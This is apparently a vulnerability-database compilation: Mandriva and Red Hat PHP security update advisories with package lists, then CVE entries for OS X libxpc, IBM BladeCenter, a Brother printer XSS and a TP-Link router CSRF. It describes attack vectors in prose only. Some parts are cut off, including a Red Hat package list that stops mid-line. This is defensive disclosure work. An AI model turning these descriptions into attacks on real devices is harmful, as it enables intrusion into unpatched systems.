http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php55 security and bug fix update
Advisory ID: RHSA-2015:1053-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1053.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-1352 CVE-2015-2301 CVE-2015-2305
CVE-2015-2348 CVE-2015-2787 CVE-2015-4147
CVE-2015-4148
=====================================================================
1. Summary:
Updated php55 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php55 packages provide a recent stable release of PHP with
the PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a
number of additional utilities.
The php55 packages have been upgraded to upstream version 5.5.21, which
provides multiple bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1057089)
The following security issues were fixed in the php55-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension.
An attacker able to trigger a certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP's move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
A NULL pointer dereference flaw was found in PHP's pgsql extension. (CVE-2015-1352)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php55-2.0-1.el7.src.rpm
php55-php-5.5.21-2.el7.src.rpm
x86_64:
php55-2.0-1.el7.x86_64.rpm
php55-php-5.5.21-2.el7.x86_64.rpm
php55-php-bcmath-5.5.21-2.el7.x86_64.rpm
php55-php-cli-5.5.21-2.el7.x86_64.rpm
php55-php-common-5.5.21-2.el7.x86_64.rpm
php55-php-dba-5.5.21-2.el7.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm
php55-php-devel-5.5.21-2.el7.x86_64.rpm
php55-php-enchant-5.5.21-2.el7.x86_64.rpm
php55-php-fpm-5.5.21-2.el7.x86_64.rpm
php55-php-gd-5.5.21-2.el7.x86_64.rpm
php55-php-gmp-5.5.21-2.el7.x86_64.rpm
php55-php-intl-5.5.21-2.el7.x86_64.rpm
php55-php-ldap-5.5.21-2.el7.x86_64.rpm
php55-php-mbstring-5.5.21-2.el7.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm
php55-php-odbc-5.5.21-2.el7.x86_64.rpm
php55-php-opcache-5.5.21-2.el7.x86_64.rpm
php55-php-pdo-5.5.21-2.el7.x86_64.rpm
php55-php-pgsql-5.5.21-2.el7.x86_64.rpm
php55-php-process-5.5.21-2.el7.x86_64.rpm
php55-php-pspell-5.5.21-2.el7.x86_64.rpm
php55-php-recode-5.5.21-2.el7.x86_64.rpm
php55-php-snmp-5.5.21-2.el7.x86_64.rpm
php55-php-soap-5.5.21-2.el7.x86_64.rpm
php55-php-xml-5.5.21-2.el7.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm
php55-runtime-2.0-1.el7.x86_64.rpm
php55-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v.
Our key and details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-1352
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201501-0272 | CVE-2014-8835 | Apple OS X of libxpc of xpc_data_get_bytes Vulnerability in arbitrary code execution in function |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue. Supplementary information: the CWE vulnerability type has been identified as CWE-19: Data Handling (Data processing), http://cwe.mitre.org/data/definitions/19.html. An attacker could execute arbitrary code by providing a crafted dictionary to sysmond. Apple Mac OS X is prone to multiple security vulnerabilities.
The update addresses new vulnerabilities that affect Bluetooth, CPU Software, CommerceKit Framework, CoreGraphics, CoreSymbolication, Intel Graphics Driver, IOHIDFamily, IOUSBFamily, Kernel, LaunchServices, LoginWindow, Sandbox, SceneKit, security, security_taskgate, Spotlight, SpotlightIndex, sysmond, and UserAccountUpdater components.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, disclose sensitive information and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect OS X prior to 10.10.2.
| VAR-201501-0384 | CVE-2014-3019 | IBM BladeCenter SAS Connectivity Module and SAS RAID Module Vulnerable to access to blades and storage pools |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IBM BladeCenter SAS Connectivity Module (aka NSSM) and SAS RAID Module (aka RSSM) before 1.3.3.006 allow remote attackers to obtain blade and storage-pool access via a TELNET session.
An attacker can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks. A security vulnerability exists in IBM BladeCenter NSSM and RSSM 1.3.3.004 and earlier versions.
| VAR-201501-0136 | CVE-2015-1056 | Brother MFC-J4410DW Cross-site scripting vulnerability in printer firmware |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Brother MFC-J4410DW printer with firmware before L allows remote attackers to inject arbitrary web script or HTML via the url parameter to general/status.html and possibly other pages. The Brother MFC-J4410DW is a color laser printer device that supports wireless network printing. An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Brother MFC-J4410DW is a printer product of Japan's Brother Industries (Brother). The vulnerability is caused by the general/status.html file not adequately filtering the 'url' parameter.
| VAR-201501-0652 | CVE-2014-9510 | TP-Link TL-WR840N Cross-site request forgery vulnerability in router firmware |
Related entries in the VARIoT exploits database: VAR-E-201501-0445 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in the administration console in TP-Link TL-WR840N (V1) router with firmware before 3.13.27 build 141120 allows remote attackers to hijack the authentication of administrators for requests that change router settings via a configuration file import. The TP-Link TL-WR840N is a wireless router device. An attacker could exploit this vulnerability to perform certain unauthorized actions. Other attacks are also possible.
TP-Link TL-WR840N routers running firmware 3.13.27 Build 140714 and prior are vulnerable.
Classification: //Dell SecureWorks/Confidential - Limited External Distribution:
############################################################################
# * Title: TP-Link TL-WR840N Configuration Import Cross-Site Request Forgery (CSRF)
# * Advisory ID: SWRX-2015-001
# * Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2015-001/
# * Date published: Wednesday, January 7, 2015
# * CVE: CVE-2014-9510
# * CVSS v2 base score: 9.3
# * Date of last update: Wednesday, January 7, 2015
# * Vendors contacted: TP-Link
# * Release mode: Coordinated
# * Discovered by: Sean Wright, Dell SecureWorks
############################################################################
Summary:
TP-Link is a primary provider of networking equipment and wireless products for small and home offices as well as for small to midsized businesses. TL-WR840N is a combination wired/wireless router specifically targeted to small business and home office networking environments. An attack could alter any configuration setting on the device.
----------------------------------------------------------------------------
Vendor information, solutions, and workarounds:
TL-WR840N users should upgrade the router's firmware to 3.13.27, build 141120 or later.
----------------------------------------------------------------------------
Details:
The TP-Link TL-WR840N router provides a web administration console that enables the device owner to change the router's configuration. The administration console includes an option to import an existing configuration from a binary file, but this feature is vulnerable to CSRF attacks. A threat actor could use social engineering to trick a victim into visiting a malicious web page that exploits the CSRF vulnerability and imports a malicious configuration file via the router's web administration console. The attacker could change any settings on the router, including the firewall settings and the router's remote administration capabilities. If the device owner has not changed the default username and password, then the attack would not require the victim to log into the router's web administration console.
----------------------------------------------------------------------------
